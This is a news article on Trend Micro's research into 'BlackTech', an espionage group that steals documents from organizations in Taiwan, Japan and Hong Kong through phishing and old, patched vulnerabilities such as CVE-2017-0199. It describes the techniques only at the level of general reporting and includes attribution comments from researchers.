A sophisticated and “well-funded” hacking group with a penchant for stealing intellectual property and other trade secrets is wreaking havoc in East Asia by exploiting a series of old, publicly acknowledged software vulnerabilities, according to research conducted by TrendMicro.
The findings are significant because it exposes an active regional threat that continues to invest in new hacking capabilities — including unique backdoor implants and an exfiltration tools — while apparently running multiple, active economic espionage operations.
Dubbed “BlackTech” by security reachers, the clandestine unit is believed to be associated with three separate campaigns dating back to at least 2010. During that time frame, BlackTech relied on a similar server infrastructure to launch attacks but used various different tools and techniques against organizations, allowing them to move laterally across victim networks and ultimately attempt to exfiltrate sensitives files.
“We are confident attributing these three campaigns to BlackTech given the backend infrastructure used and target overlap,” said Trend Micro Vice President Mark Nunnikhoven. “The backend infrastructure — where the stolen data is sent — is unique to these campaigns and it is extremely rare that unrelated criminals groups share infrastructure for targeted attacks.”
BlackTech has in the past used an exploit for a Adobe Flash vulnerability (CVE-2015-5119) that was leaked during the Hacking Team breach. In addition, the group was seen taking advantage of outdated software flaws, all of which have already been patched, in older versions of Microsoft Windows, including the now infamous CVE-2017-0199.
CVE-0199 has become especially popular in recent months amongst cybercrime groups looking for an opening to plant ransomware on a server or computer.
“The ulterior motive of [BlackTech] is to steal important documents from their victims; initial recipients of their attacks are not always their primary target,” Trend Micro’s report reads. “We saw several decoy documents stolen by the attackers that are then used against another target. This indicates that document theft is most likely the first phase of an attack chain against a victim with ties to the intended target.”
Researchers found digital forensic evidence that BlackTech had worked to compromise a variety of companies and organizations, including “privatized agencies and government contractors as well as enterprises in the consumer electronics, computer, healthcare and financial industries,” particularly those based in Taiwan and occasionally in Japan and Hong Kong.
“We’re seeing a continued investment by this group to keep their malware relevant,” said Nunnikhoven. “That’s a strong indicator that this group is having some measure of success.”
He added, “running concurrent targeted campaigns using a variety of techniques takes a lot of effort. That effort would be better spent on other cybercrimes if they weren’t getting what they are after.”
BlackTech is known to send phishing emails that contain malicious Microsoft Word document attachments to the employees of targeted organizations. When opened, the attachment calls out to the attacker’s command and control infrastructure, allowing for the hackers to upload malware.
Experts say that competitive economic espionage, empowered by cyber means, has become common in the East Asia region. Countries like Vietnam are believed to be heavily investing in developing hacking capabilities.
For most of Asia, Chinese espionage like this remains the norm. https://t.co/GhnHmOTo2J
— John Hultquist (@JohnHultquist) June 22, 2017
Although the group uncovered by Trend Micro appears to be similar in some respects to another threat actor named “APT12,” revealed by U.S. cybersecurity firm FireEye, Nunnikhoven said there is no definitive proof to confidently link the two entities.
“We currently have no evidence that ties BlackTech to APT12. While there is some similarity in the targets and techniques, there isn’t enough data to draw a link between the two groups,” he said.